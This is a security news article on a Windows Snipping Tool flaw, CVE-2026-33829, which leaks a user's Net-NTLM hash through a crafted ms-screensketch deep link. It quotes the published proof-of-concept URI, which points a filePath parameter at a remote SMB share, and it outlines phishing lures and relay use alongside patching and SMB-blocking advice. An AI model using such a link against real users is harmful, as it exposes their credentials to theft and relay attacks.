PoC exploit released for Windows Snipping Tool NTLM hash leak vulnerability
4 min. read 
Published on
A proof-of-concept exploit is now public for CVE-2026-33829, a Windows Snipping Tool flaw that can leak a user’s Net-NTLM hash when the victim opens a malicious link or webpage. Microsoft classifies the issue as a spoofing vulnerability in Windows Snipping Tool, while NVD describes it as exposure of sensitive information to an unauthorized actor over a network.
The attack works through the ms-screensketch protocol handler registered by affected Snipping Tool versions. Black Arrow Security says the vulnerable deep link accepts a filePath parameter, and that parameter can point to a remote SMB share, which causes Windows to initiate an authenticated SMB connection and expose the victim’s Net-NTLM response.
Access content across the globe at the highest speed rate.
70% of our readers choose Private Internet Access
70% of our readers choose ExpressVPN
Browse the web from multiple devices with industry-standard security protocols.
Faster dedicated servers for specific actions (currently at summer discounts)
That makes the bug useful for phishing and internal network attacks. An attacker can wrap the malicious URI inside a webpage or HTML file, then rely on a believable pretext such as asking a user to crop an image, edit a badge photo, or review a document. Black Arrow notes that the Snipping Tool opens normally during the attack, which helps the lure look legitimate.
How the exploit works
Black Arrow’s public advisory says the vulnerable flow starts when a victim opens a crafted URI that triggers Snipping Tool through ms-screensketch. The proof of concept uses a UNC path in the filePath parameter so the app tries to load content from an attacker-controlled SMB server.
The published example looks like this:
ms-screensketch:edit?&filePath=\\snip.blackarrow.lab\file.png&isTemporary=false&saved=true&source=Toast
When Snipping Tool processes that link, Windows attempts SMB authentication to the remote host. That SMB negotiation can expose the victim’s Net-NTLM hash, which an attacker may then crack offline or use in relay-style attacks, depending on the environment.
Why this matters
The vulnerability does not need code execution to become dangerous. A leaked Net-NTLM hash can still give attackers a useful foothold, especially in enterprise networks where SMB-based authentication remains common and relay opportunities exist. This is why even a CVSS 4.3 “medium” bug can matter in real phishing campaigns.
The attack also has a low barrier to entry. Black Arrow says exploitation only requires user interaction in the form of visiting a malicious page or opening a link. That makes the bug easier to fold into email lures, helpdesk scams, or fake internal document workflows.
Microsoft included CVE-2026-33829 in its April 14, 2026 security updates, and NVD lists the flaw as published the same day. Black Arrow’s disclosure timeline says the issue was reported on March 23, 2026, fixed on April 14, and publicly released in coordination with Microsoft on April 14.
At a glance
| Item | Detail |
|---|---|
| CVE | CVE-2026-33829 |
| Product | Windows Snipping Tool |
| Vulnerability type | Sensitive information exposure / spoofing over a network |
| Trigger | Malicious ms-screensketch deep link |
| Main risk | Net-NTLM hash leakage through SMB authentication |
| User interaction required | Yes |
| Patch date | April 14, 2026 |
Supported by Microsoft, NVD, and Black Arrow’s advisory.
What organizations should do now
Organizations should deploy Microsoft’s April 14, 2026 security updates on affected Windows systems as quickly as possible. Black Arrow’s recommendation is direct: install the April 14 security patches released by Microsoft.
Security teams should also watch for unexpected outbound SMB traffic to untrusted hosts. Even after patching, blocking or tightly restricting outbound SMB at the perimeter remains a strong control because it cuts off a common path for NTLM hash capture and relay setup. This is a defensive inference based on the exploit path documented by Black Arrow.
User awareness matters too. Employees should be cautious with links that trigger local Windows apps, especially when the request comes through email or chat and claims to involve images, forms, or internal documents. In this case, the fact that Snipping Tool opens normally can make the lure look harmless.
Recommended actions
- Apply Microsoft’s April 14, 2026 security update for CVE-2026-33829.
- Monitor for unusual outbound SMB connections to unknown or internet-hosted systems.
- Block outbound SMB where business needs allow.
- Warn users about malicious links that open local Windows apps such as Snipping Tool.
- Review phishing detections for HTML pages or redirects that trigger custom URI schemes. This is an inference based on the public PoC flow.
FAQ
CVE-2026-33829 is a Windows Snipping Tool vulnerability that can expose a victim’s Net-NTLM authentication response over the network when the app is triggered with a crafted deep link.
No. The public PoC shows the attack can start with a malicious URI or webpage that triggers Snipping Tool through the ms-screensketch protocol.
Yes. NVD links to Black Arrow Security’s public GitHub repository for CVE-2026-33829, and that repository includes a readme and demonstration material.
Yes. Microsoft released the fix on April 14, 2026.
Read our disclosure page to find out how can you help VPNCentral sustain the editorial team Read more
Improve this guide
User forum
0 messages